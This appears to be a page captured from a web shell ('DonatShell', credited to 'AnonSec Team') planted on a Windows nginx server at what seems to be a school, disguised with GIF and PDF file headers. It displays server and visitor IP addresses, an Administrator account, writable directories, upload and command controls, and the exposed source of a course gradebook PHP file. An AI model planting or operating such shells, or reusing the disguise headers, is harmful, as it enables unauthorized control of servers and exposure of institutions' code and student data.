GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Course/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Course//AssignmentGrades.phpinc
<?
// Course/AssignmentGrades.phpinc
// 
if ( !isset($f_classId) ) $f_classId = formValue('classId');
#$f_classId = "406,365";
$isGB = false;
$f_classIdList = $f_classId;
$f_classIdArray = listToArray($f_classId);
$classIndex = 0;
#printVar('$f_classIdArray',$f_classIdArray);
foreach ($f_classIdArray as $f_classId) {
#	if ( $_SESSION['userId'] != 1 ) {
#		include('Gradebook/Gradebook_css_js.phpinc');
#		include('Gradebook/ClassGradebook.phpinc');
#	} else {
		include('Gradebook/Assignments.phpinc');
#	}
  //$classIndex++;
}
?>

<div id="changeWidthDebug" style="display:none;"></div>

<script type="text/javascript">
<!--
function changeView() {
	//alert('changeView()');
<?
	for ($i=0; $i<$classIndex; $i++) {
?>
	changeWidth('scrollDiv<?=$i?>');
<?
	}
?>
}
function openGradeWindow(Id,fullscreen,name) {
	//alert(eId.id);
	if ( fullscreen == undefined ) fullscreen = false;
	if ( name == undefined ) name = 'Grade';
	//alert('fullscreen='+fullscreen);
	var url = '/Gradebook/GradeEvaluation.php';
	var eIdArray = Id.id.split("_");
	var cId = eIdArray[1];
	var sId = eIdArray[2];
	var uId = eIdArray[3];
	var eId = eIdArray[4];
	url += url+'?f_classId='+cId+'&f_sId='+sId+'&f_uId='+uId+'&f_eId='+eId;
	if ( fullscreen == 0 ) {
		openCenteredWindow(url+'&FromGradebook=0',1080,700,name);
	} else {
		openCenteredWindow(url+'&FromGradebook=1',-1,-1,name);
	}
}
changeView();
// -->
</script>
<?
#printVar('$gradePoints',$gradePoints);
#printVar('$totalPoints',$totalPoints);
#printVar('$percent',$percent);
#printVar('$grade',$grade);
?>

Anon7 - 2022
AnonSec Team